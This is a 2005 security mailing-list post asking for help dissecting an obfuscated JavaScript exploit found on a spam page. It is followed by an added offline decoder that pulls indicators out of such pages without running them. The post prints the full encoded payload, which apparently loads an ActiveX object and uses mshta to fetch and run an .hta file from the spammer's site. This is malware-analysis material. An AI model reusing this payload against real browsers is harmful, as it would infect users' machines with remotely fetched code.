[Dshield] Help Needed With Dissection of Exploit

Nemo Omen nemoaus at hotmail.com
Wed Aug 10 04:04:56 GMT 2005


I became aware of a new piece of spam last week. It tells me I can get bank 
account passwords and transfer some money into my account too. A deal too 
good to refuse. The address is http:/www.asdfgh.org/passwords.html  Don't 
load this site up unless you are happy to infect your machine or use a non 
m/s o/s.

The displayed page is pretty dull, telling me that I need PGP to unencrypt 
the contents. Looking at the page source is more interesting. Below, I 
substituted javascript with XXX. It starts off with a Javascript 
document.write; I don't need to be very clever to determine that it is 
probably writing some sort of malware to my hard disk. I would like a bit of 
help with the analysis of this malware.

1) What is the name of this exploit?

2) I don't know a whole lot about the javascript unescape function. What 
does it do?

3) Are the %codes below machine opcodes or something else?

4) What are the next steps in analysis of this malware?

Regards.  Nem

<script 
language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286Fvw%7Coh%2
86H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfurooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QD
PH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%285%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%286Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%283%3C%283%3C%283%3C3')</script>

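The script in the post is two layers of string transformation, and both can be undone on paper without ever loading the page in a browser. The first layer is plain unescape(): every %XX is a hex byte, so '%3C%73%63%72%69%70%74' is just '<script'. Decoding that first literal yields a small function, dF(s), which takes the last character of its argument as a decimal key, unescapes the rest, subtracts the key from every character code, and unescapes the result a second time before document.write'ing it. The following decoder is an added example, not code from the post or from the site it describes: it re-implements unescape()/escape() rather than relying on the deprecated globals, mirrors dF() as a pure string function, and pulls tag names, classids and URLs out of whatever the decoded layer contains so an analyst can see what the page would have written without executing it. The sample page, the nil classid and the example.invalid URL it decodes at the end are constructed placeholders; the only real data used is the first twelve characters of the post's dF() argument, which decode to a harmless '<style' tag.

```javascript
// Offline decoder for the two-layer obfuscation pattern in the post above.
// Nothing is evaluated or written to a DOM; strings are only transformed,
// so this can be run in Node against a saved copy of a page.
//
// Layer 1: document.write(unescape('%3C...'))  -> plain %XX hex escapes
// Layer 2: dF(s): unescape(s without its last char), subtract that last
//          char (a decimal digit) from every char code, unescape again.

// Re-implementation of the legacy JavaScript unescape(): %XX becomes the
// character with that code, %uXXXX a UTF-16 code unit; other text is kept.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u4, x2) => String.fromCharCode(parseInt(u4 !== undefined ? u4 : x2, 16)));
}

// Inverse of jsUnescape, matching legacy escape(): A-Z a-z 0-9 @*_+-./ pass through.
function jsEscape(s) {
  return s.replace(/[^A-Za-z0-9@*_+\-./]/g, c => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '%' + code.toString(16).toUpperCase().padStart(2, '0')
      : '%u' + code.toString(16).toUpperCase().padStart(4, '0');
  });
}

// Add delta to every UTF-16 code unit (negative delta undoes the shift).
function shiftCodes(s, delta) {
  let out = '';
  for (let i = 0; i < s.length; i++) out += String.fromCharCode(s.charCodeAt(i) + delta);
  return out;
}

// Static equivalent of the dF() function that layer 1 defines.
function decodeDF(s) {
  const key = parseInt(s.slice(-1), 10);     // last char is the shift key
  const s1 = jsUnescape(s.slice(0, -1));     // first unescape
  return jsUnescape(shiftCodes(s1, -key));   // subtract key, unescape again
}

// Inverse of decodeDF; used only to build a labelled sample for checking.
function encodeDF(plain, key) {
  return jsEscape(shiftCodes(jsEscape(plain), key)) + String(key);
}

// Pull the string literals out of unescape('...') and dF('...') calls in a
// saved page and return both layers decoded (null if a layer is absent).
function decodePage(html) {
  const grab = (name) => {
    const m = html.match(new RegExp(name + "\\('([^']*)'\\)"));
    return m ? m[1] : null;
  };
  const layer1 = grab('unescape');
  const layer2 = grab('dF');
  return {
    layer1: layer1 === null ? null : jsUnescape(layer1),
    layer2: layer2 === null ? null : decodeDF(layer2),
  };
}

// Indicators a defender would pull from the decoded HTML: tag names,
// classid values and anything shaped like a URL.
function indicators(html) {
  return {
    tags: [...new Set((html.match(/<\s*([A-Za-z]+)/g) || [])
      .map(t => t.replace(/<\s*/, '').toLowerCase()))],
    classids: html.match(/clsid:[0-9a-fA-F-]+/g) || [],
    urls: html.match(/[a-z]+:\/\/[^\s'"<>]+/gi) || [],
  };
}

// Constructed sample page (placeholder classid and URL, not the post's payload).
const SAMPLE_KEY = 3;
const SAMPLE_INNER = '<object id=x1 classid=clsid:00000000-0000-0000-0000-000000000000>' +
  '<param name="Item1" value="http://example.invalid/placeholder.hta"></object>';
const SAMPLE_PAGE = "<script>document.write(unescape('" +
  jsEscape('<script>function dF(s){}</script>') + "'));dF('" +
  encodeDF(SAMPLE_INNER, SAMPLE_KEY) + "')</script>";

// Stand-alone run: decode the constructed page and list its indicators.
const layers = decodePage(SAMPLE_PAGE);
console.log(layers.layer1);
console.log(layers.layer2);
console.log(indicators(layers.layer2));
// The first twelve characters of the post's dF() argument decode to '<style'.
console.log(decodeDF('%286Fvw%7Coh3'));
```

Running decodePage() over a saved copy of the real page gives the HTML that the browser would have written into the document; the indicators() output (OBJECT classids, PARAM values, any URLs) is what goes into a ticket or a blocklist, and the decoded text is what to compare against published advisories when answering question 1. Because the shift key is the last character of the dF() argument, a variant that changes the digit decodes with the same function unchanged.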


